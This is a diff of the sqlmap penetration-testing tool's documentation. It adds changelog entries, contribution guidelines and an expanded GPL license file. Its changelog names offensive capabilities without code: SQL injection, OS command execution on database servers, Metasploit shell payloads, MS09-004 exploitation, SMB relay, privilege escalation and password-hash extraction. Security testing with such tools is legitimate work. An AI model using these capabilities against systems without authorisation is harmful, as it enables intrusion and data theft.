* Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable.
|
||||||
|
* Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys.
|
||||||
|
* Added options for MySQL and PostgreSQL to inject custom user-defined functions.
|
||||||
|
* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output.
|
||||||
|
* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified.
|
||||||
|
* Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system.
|
||||||
|
* Minor bugs fixed.
|
||||||
|
* Major code refactoring.
|
||||||
|
|
||||||
|
# Version 0.7 (2009-07-25)
|
||||||
|
|
||||||
|
* Adapted Metasploit wrapping functions to work with latest 3.3 development version too.
|
||||||
|
* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
|
||||||
|
* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too.
|
||||||
|
* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=).
|
||||||
|
* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.
|
||||||
|
* Major bug fix to sql-query/sql-shell features.
|
||||||
|
* Major bug fix in `--read-file` option.
|
||||||
|
* Major silent bug fix to multi-threading functionality.
|
||||||
|
* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided.
|
||||||
|
* Fixed MySQL 'comment injection' version fingerprint.
|
||||||
|
* Fixed basic Microsoft SQL Server 2000 fingerprint.
|
||||||
|
* Many minor bug fixes and code refactoring.
|
||||||
|
|
||||||
|
# Version 0.7 release candidate (2009-04-22)
|
||||||
|
|
||||||
|
* Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server;
|
||||||
|
* Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux;
|
||||||
|
* Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support;
|
||||||
|
* Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit;
|
||||||
|
* Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server;
|
||||||
|
* Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable;
|
||||||
|
* Speed up the inference algorithm by providing the minimum required charset for the query output;
|
||||||
|
* Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little;
|
||||||
|
* Many minor bug fixes, minor enhancements and layout adjustments.
|
||||||
|
|
||||||
|
# Version 0.6.4 (2009-02-03)
|
||||||
|
|
||||||
|
* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object;
|
||||||
|
* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology;
|
||||||
|
* Major speed increase in DBMS basic fingerprint;
|
||||||
|
* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator;
|
||||||
|
* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing;
|
||||||
|
* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment;
|
||||||
|
* Minor layout adjustment to the `--update` output;
|
||||||
|
* Increased default timeout to 30 seconds;
|
||||||
|
* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle;
|
||||||
|
* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable;
|
||||||
|
* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server;
|
||||||
|
* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided;
|
||||||
|
* Updated documentation.
|
||||||
|
|
||||||
|
# Version 0.6.3 (2008-12-18)
|
||||||
|
|
||||||
|
* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l <filepath>;
|
||||||
|
* Major enhancement to support Partial UNION query SQL injection technique too;
|
||||||
|
* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality;
|
||||||
|
* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`;
|
||||||
|
* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers;
|
||||||
|
* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided;
|
||||||
|
* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher;
|
||||||
|
* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`;
|
||||||
|
* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user;
|
||||||
|
* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
|
||||||
|
* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content;
|
||||||
|
* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set;
|
||||||
|
* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords;
|
||||||
|
* Minor improvements to sqlmap Debian package files;
|
||||||
|
* Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations;
|
||||||
|
* Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url;
|
||||||
|
* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
|
||||||
|
* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified;
|
||||||
|
* Minor bug fix to correctly dump table entries when the column is provided;
|
||||||
|
* Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests;
|
||||||
|
* Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread;
|
||||||
|
* Increased default output level from 0 to 1;
|
||||||
|
* Updated documentation.
|
||||||
|
|
||||||
|
# Version 0.6.2 (2008-11-02)
|
||||||
|
|
||||||
|
* Major bug fix to correctly dump tables entries when `--stop` is not specified;
|
||||||
|
* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0;
|
||||||
|
* Major bug fix when the request is POST to also send the GET parameters if any have been provided;
|
||||||
|
* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`;
|
||||||
|
* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file;
|
||||||
|
* Minor bug fix in MySQL comment injection fingerprint technique;
|
||||||
|
* Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database;
|
||||||
|
* Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided;
|
||||||
|
* Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
|
||||||
|
* More user-friendly warning messages.
|
||||||
|
|
||||||
|
# Version 0.6.1 (2008-08-20)
|
||||||
|
|
||||||
|
* Major bug fix to blind SQL injection bisection algorithm to handle an exception;
|
||||||
|
* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
|
||||||
|
* Implemented possibility to test for and inject also on LIKE statements;
|
||||||
|
* Implemented `--start` and `--stop` options to set the first and the last table entry to dump;
|
||||||
|
* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool;
|
||||||
|
* Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes;
|
||||||
|
* Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore;
|
||||||
|
* Minor bug fix to correctly handle parameters' value with `%` character.
|
||||||
|
|
||||||
|
# Version 0.6 (2008-09-01)
|
||||||
|
|
||||||
|
* Complete code refactor and many bugs fixed;
|
||||||
|
* Added multithreading support to set the maximum number of concurrent HTTP requests;
|
||||||
|
* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack;
|
||||||
|
* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator;
|
||||||
|
* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file;
|
||||||
|
* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option;
|
||||||
|
* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages;
|
||||||
|
* Created sqlmap .exe (Windows) portable executable;
|
||||||
|
* Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times;
|
||||||
|
* Improved automatic check for parenthesis when testing and forging SQL query vector;
|
||||||
|
* Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable;
|
||||||
|
* Implemented support for HTTPS requests over HTTP(S) proxy;
|
||||||
|
* Added a check to handle NULL or not available queries output;
|
||||||
|
* More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks;
|
||||||
|
* Improved XML files structure;
|
||||||
|
* Implemented the possibility to change the HTTP Referer header;
|
||||||
|
* Added support to resume from session file also when running with inband SQL injection attack;
|
||||||
|
* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root;
|
||||||
|
* Added a check to assure that the provided string to match (`--string`) is within the page content;
|
||||||
|
* Fixed various queries in XML file;
|
||||||
|
* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it;
|
||||||
|
* Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function;
|
||||||
|
* Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable;
|
||||||
|
* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic;
|
||||||
|
* Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires;
|
||||||
|
* Added support to inject also on Set-Cookie parameters;
|
||||||
|
* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`;
|
||||||
|
* Renamed some command line options;
|
||||||
|
* Added a conversion library;
|
||||||
|
* Added code schema and reminders for future developments;
|
||||||
|
* Added Copyright comment and $Id$;
|
||||||
|
* Updated the command line layout and help messages;
|
||||||
|
* Updated some docstrings;
|
||||||
|
* Updated documentation files.
|
||||||
|
|
||||||
|
# Version 0.5 (2007-11-04)
|
||||||
|
|
||||||
|
* Added support for Oracle database management system
|
||||||
|
* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins;
|
||||||
|
* Added support to extract database users password hash on Microsoft SQL Server;
|
||||||
|
* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;
|
||||||
|
* Added support for SQL injection on HTTP Cookie and User-Agent headers;
|
||||||
|
* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Splitted getValue() into getInband() and getBlind();
|
||||||
|
* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;
|
||||||
|
* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;
|
||||||
|
* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`);
|
||||||
|
* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default;
|
||||||
|
* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml;
|
||||||
|
* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped;
|
||||||
|
* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py;
|
||||||
|
* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`);
|
||||||
|
* Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces;
|
||||||
|
* More minor layout enhancements in some libraries;
|
||||||
|
* Renamed DMBS plugins;
|
||||||
|
* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
|
||||||
|
* Updated all documentation files.
|
||||||
|
|
||||||
|
# Version 0.4 (2007-06-15)
|
||||||
|
|
||||||
|
* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS;
|
||||||
|
* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
|
||||||
|
* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
|
||||||
|
* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
|
||||||
|
* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <http://sqlmap.org/dev/>;
|
||||||
|
* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
|
||||||
|
* Improved logging functionality: passed from banal 'print' to Python native logging library;
|
||||||
|
* Added support for more than one parameter in `-p` command line option;
|
||||||
|
* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`);
|
||||||
|
* Added the command line option `--remote-dbms` to manually specify the remote DBMS;
|
||||||
|
* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements;
|
||||||
|
* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`);
|
||||||
|
* Added support to specify the database table column to enumerate (`-C COL`);
|
||||||
|
* Added inband SQL injection (UNION query) support (`--union-use`);
|
||||||
|
* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
|
||||||
|
* Reviewed the directory tree structure;
|
||||||
|
* Splitted lib/common.py: inband injection functionalities now are moved to lib/union.py;
|
||||||
|
* Updated documentation files.
|
||||||
|
|
||||||
|
# Version 0.3 (2007-01-20)
|
||||||
|
|
||||||
|
* Added module for MS SQL Server;
|
||||||
|
* Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check;
|
||||||
|
* Added PostgreSQL dbms active fingerprint;
|
||||||
|
* Added support for string match (`--string`);
|
||||||
|
* Added support for UNION check (`--union-check`);
|
||||||
|
* Removed duplicated code, delegated most of features to the engine in common.py and option.py;
|
||||||
|
* Added support for `--data` command line argument to pass the string for POST requests;
|
||||||
|
* Added encodeParams() method to encode url parameters before making http request;
|
||||||
|
* Many bug fixes;
|
||||||
|
* Rewritten documentation files;
|
||||||
|
* Complete code restyling.
|
||||||
|
|
||||||
|
# Version 0.2 (2006-12-13)
|
||||||
|
|
||||||
|
* complete refactor of entire program;
|
||||||
|
* added TODO and THANKS files;
|
||||||
|
* added some papers references in README file;
|
||||||
|
* moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header;
|
||||||
|
* strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions;
|
||||||
|
* replaced old inference algorithm with a new bisection algorithm.
|
||||||
|
* reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter;
|
||||||
|
* improved Common class, adding support for http proxy and http post method in hash_page;
|
||||||
|
* added OptionCheck class in option.py which performs all needed checks on command line parameters and values;
|
||||||
|
* added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters;
|
||||||
|
* improved output methods in dump.py;
|
||||||
|
* layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions.
|
||||||
38
doc/CONTRIBUTING.md
Normal file
38
doc/CONTRIBUTING.md
Normal file
@@ -0,0 +1,38 @@
|
|||||||
|
# Contributing to sqlmap
|
||||||
|
|
||||||
|
## Reporting bugs
|
||||||
|
|
||||||
|
**Bug reports are welcome**!
|
||||||
|
Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
|
||||||
|
|
||||||
|
### Guidelines
|
||||||
|
|
||||||
|
* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
|
||||||
|
* Make sure you can reproduce the bug with the latest development version of sqlmap.
|
||||||
|
* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
|
||||||
|
* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
|
||||||
|
* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up.
|
||||||
|
|
||||||
|
## Submitting code changes
|
||||||
|
|
||||||
|
All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
|
||||||
|
|
||||||
|
Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
|
||||||
|
Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
|
||||||
|
|
||||||
|
### Guidelines
|
||||||
|
|
||||||
|
In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
|
||||||
|
|
||||||
|
* Each patch should make one logical change.
|
||||||
|
* Wrap code to 76 columns when possible.
|
||||||
|
* Avoid tabbing, use four blank spaces instead.
|
||||||
|
* Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org).
|
||||||
|
* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
|
||||||
|
* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
|
||||||
|
* Style that is too different from main branch will be ''adapted'' by the developers side.
|
||||||
|
* Do not touch anything inside `thirdparty/` and `extra/` folders.
|
||||||
|
|
||||||
|
### Licensing
|
||||||
|
|
||||||
|
By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
|
||||||
158
doc/COPYING
158
doc/COPYING
@@ -1,8 +1,73 @@
|
|||||||
|
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
||||||
|
of the GNU General Public License (GPL) is appended to this file.
|
||||||
|
|
||||||
|
sqlmap is (C) 2006-2016 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||||
|
|
||||||
|
This program is free software; you may redistribute and/or modify it under
|
||||||
|
the terms of the GNU General Public License as published by the Free
|
||||||
|
Software Foundation; Version 2 (or later) with the clarifications and
|
||||||
|
exceptions described below. This guarantees your right to use, modify, and
|
||||||
|
redistribute this software under certain conditions. If you wish to embed
|
||||||
|
sqlmap technology into proprietary software, we sell alternative licenses
|
||||||
|
(contact sales@sqlmap.org).
|
||||||
|
|
||||||
|
Note that the GPL places important restrictions on "derived works", yet it
|
||||||
|
does not provide a detailed definition of that term. To avoid
|
||||||
|
misunderstandings, we interpret that term as broadly as copyright law
|
||||||
|
allows. For example, we consider an application to constitute a "derived
|
||||||
|
work" for the purpose of this license if it does any of the following:
|
||||||
|
* Integrates source code from sqlmap.
|
||||||
|
* Reads or includes sqlmap copyrighted data files, such as xml/queries.xml
|
||||||
|
* Executes sqlmap and parses the results (as opposed to typical shell or
|
||||||
|
execution-menu apps, which simply display raw sqlmap output and so are
|
||||||
|
not derivative works).
|
||||||
|
* Integrates/includes/aggregates sqlmap into a proprietary executable
|
||||||
|
installer, such as those produced by InstallShield.
|
||||||
|
* Links to a library or executes a program that does any of the above
|
||||||
|
|
||||||
|
The term "sqlmap" should be taken to also include any portions or derived
|
||||||
|
works of sqlmap. This list is not exclusive, but is meant to clarify our
|
||||||
|
interpretation of derived works with some common examples. Our
|
||||||
|
interpretation applies only to sqlmap - we do not speak for other people's
|
||||||
|
GPL works.
|
||||||
|
|
||||||
|
If you have any questions about the GPL licensing restrictions on using
|
||||||
|
sqlmap in non-GPL works, we would be happy to help. As mentioned above,
|
||||||
|
we also offer alternative license to integrate sqlmap into proprietary
|
||||||
|
applications and appliances.
|
||||||
|
|
||||||
|
If you received these files with a written license agreement or contract
|
||||||
|
stating terms other than the terms above, then that alternative license
|
||||||
|
agreement takes precedence over these comments.
|
||||||
|
|
||||||
|
Source is provided to this software because we believe users have a right
|
||||||
|
to know exactly what a program is going to do before they run it.
|
||||||
|
|
||||||
|
Source code also allows you to fix bugs and add new features. You are
|
||||||
|
highly encouraged to send your changes to dev@sqlmap.org for possible
|
||||||
|
incorporation into the main distribution. By sending these changes to the
|
||||||
|
sqlmap developers, to the mailing lists, or via Git pull request, checking
|
||||||
|
them into the sqlmap source code repository, it is understood (unless you
|
||||||
|
specify otherwise) that you are offering the sqlmap project the unlimited,
|
||||||
|
non-exclusive right to reuse, modify, and relicense the code. sqlmap will
|
||||||
|
always be available Open Source, but this is important because the
|
||||||
|
inability to relicense code has caused devastating problems for other Free
|
||||||
|
Software projects (such as KDE and NASM). If you wish to specify special
|
||||||
|
license conditions of your contributions, just say so when you send them.
|
||||||
|
|
||||||
|
This program is distributed in the hope that it will be useful, but
|
||||||
|
WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
General Public License v2.0 for more details at
|
||||||
|
http://www.gnu.org/licenses/gpl-2.0.html, or below
|
||||||
|
|
||||||
|
****************************************************************************
|
||||||
|
|
||||||
GNU GENERAL PUBLIC LICENSE
|
GNU GENERAL PUBLIC LICENSE
|
||||||
Version 2, June 1991
|
Version 2, June 1991
|
||||||
|
|
||||||
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
|
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
|
||||||
51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||||
Everyone is permitted to copy and distribute verbatim copies
|
Everyone is permitted to copy and distribute verbatim copies
|
||||||
of this license document, but changing it is not allowed.
|
of this license document, but changing it is not allowed.
|
||||||
|
|
||||||
@@ -15,7 +80,7 @@ software--to make sure the software is free for all its users. This
|
|||||||
General Public License applies to most of the Free Software
|
General Public License applies to most of the Free Software
|
||||||
Foundation's software and to any other program whose authors commit to
|
Foundation's software and to any other program whose authors commit to
|
||||||
using it. (Some other Free Software Foundation software is covered by
|
using it. (Some other Free Software Foundation software is covered by
|
||||||
the GNU Library General Public License instead.) You can apply it to
|
the GNU Lesser General Public License instead.) You can apply it to
|
||||||
your programs, too.
|
your programs, too.
|
||||||
|
|
||||||
When we speak of free software, we are referring to freedom, not
|
When we speak of free software, we are referring to freedom, not
|
||||||
@@ -55,7 +120,7 @@ patent must be licensed for everyone's free use or not licensed at all.
|
|||||||
|
|
||||||
The precise terms and conditions for copying, distribution and
|
The precise terms and conditions for copying, distribution and
|
||||||
modification follow.
|
modification follow.
|
||||||
|
|
||||||
GNU GENERAL PUBLIC LICENSE
|
GNU GENERAL PUBLIC LICENSE
|
||||||
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
|
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
|
||||||
|
|
||||||
@@ -110,7 +175,7 @@ above, provided that you also meet all of these conditions:
|
|||||||
License. (Exception: if the Program itself is interactive but
|
License. (Exception: if the Program itself is interactive but
|
||||||
does not normally print such an announcement, your work based on
|
does not normally print such an announcement, your work based on
|
||||||
the Program is not required to print an announcement.)
|
the Program is not required to print an announcement.)
|
||||||
|
|
||||||
These requirements apply to the modified work as a whole. If
|
These requirements apply to the modified work as a whole. If
|
||||||
identifiable sections of that work are not derived from the Program,
|
identifiable sections of that work are not derived from the Program,
|
||||||
and can be reasonably considered independent and separate works in
|
and can be reasonably considered independent and separate works in
|
||||||
@@ -168,7 +233,7 @@ access to copy from a designated place, then offering equivalent
|
|||||||
access to copy the source code from the same place counts as
|
access to copy the source code from the same place counts as
|
||||||
distribution of the source code, even though third parties are not
|
distribution of the source code, even though third parties are not
|
||||||
compelled to copy the source along with the object code.
|
compelled to copy the source along with the object code.
|
||||||
|
|
||||||
4. You may not copy, modify, sublicense, or distribute the Program
|
4. You may not copy, modify, sublicense, or distribute the Program
|
||||||
except as expressly provided under this License. Any attempt
|
except as expressly provided under this License. Any attempt
|
||||||
otherwise to copy, modify, sublicense or distribute the Program is
|
otherwise to copy, modify, sublicense or distribute the Program is
|
||||||
@@ -225,7 +290,7 @@ impose that choice.
|
|||||||
|
|
||||||
This section is intended to make thoroughly clear what is believed to
|
This section is intended to make thoroughly clear what is believed to
|
||||||
be a consequence of the rest of this License.
|
be a consequence of the rest of this License.
|
||||||
|
|
||||||
8. If the distribution and/or use of the Program is restricted in
|
8. If the distribution and/or use of the Program is restricted in
|
||||||
certain countries either by patents or by copyrighted interfaces, the
|
certain countries either by patents or by copyrighted interfaces, the
|
||||||
original copyright holder who places the Program under this License
|
original copyright holder who places the Program under this License
|
||||||
@@ -278,63 +343,30 @@ PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
|
|||||||
POSSIBILITY OF SUCH DAMAGES.
|
POSSIBILITY OF SUCH DAMAGES.
|
||||||
|
|
||||||
END OF TERMS AND CONDITIONS
|
END OF TERMS AND CONDITIONS
|
||||||
|
|
||||||
How to Apply These Terms to Your New Programs
|
|
||||||
|
|
||||||
If you develop a new program, and you want it to be of the greatest
|
****************************************************************************
|
||||||
possible use to the public, the best way to achieve this is to make it
|
|
||||||
free software which everyone can redistribute and change under these terms.
|
|
||||||
|
|
||||||
To do so, attach the following notices to the program. It is safest
|
This license does not apply to the following components:
|
||||||
to attach them to the start of each source file to most effectively
|
|
||||||
convey the exclusion of warranty; and each file should have at least
|
|
||||||
the "copyright" line and a pointer to where the full notice is found.
|
|
||||||
|
|
||||||
<one line to give the program's name and a brief idea of what it does.>
|
* The Ansistrm library located under thirdparty/ansistrm/.
|
||||||
Copyright (C) <year> <name of author>
|
* The Beautiful Soup library located under thirdparty/beautifulsoup/.
|
||||||
|
* The Bottle library located under thirdparty/bottle/.
|
||||||
|
* The Chardet library located under thirdparty/chardet/.
|
||||||
|
* The ClientForm library located under thirdparty/clientform/.
|
||||||
|
* The Colorama library located under thirdparty/colorama/.
|
||||||
|
* The Fcrypt library located under thirdparty/fcrypt/.
|
||||||
|
* The Gprof2dot library located under thirdparty/gprof2dot/.
|
||||||
|
* The KeepAlive library located under thirdparty/keepalive/.
|
||||||
|
* The Magic library located under thirdparty/magic/.
|
||||||
|
* The MultipartPost library located under thirdparty/multipartpost/.
|
||||||
|
* The Odict library located under thirdparty/odict/.
|
||||||
|
* The Oset library located under thirdparty/oset/.
|
||||||
|
* The PageRank library located under thirdparty/pagerank/.
|
||||||
|
* The PrettyPrint library located under thirdparty/prettyprint/.
|
||||||
|
* The PyDes library located under thirdparty/pydes/.
|
||||||
|
* The SocksiPy library located under thirdparty/socks/.
|
||||||
|
* The Termcolor library located under thirdparty/termcolor/.
|
||||||
|
* The XDot library located under thirdparty/xdot/.
|
||||||
|
* The icmpsh tool located under extra/icmpsh/.
|
||||||
|
|
||||||
This program is free software; you can redistribute it and/or modify
|
Details for the above packages can be found in the THIRD-PARTY.md file.
|
||||||
it under the terms of the GNU General Public License as published by
|
|
||||||
the Free Software Foundation; either version 2 of the License, or
|
|
||||||
(at your option) any later version.
|
|
||||||
|
|
||||||
This program is distributed in the hope that it will be useful,
|
|
||||||
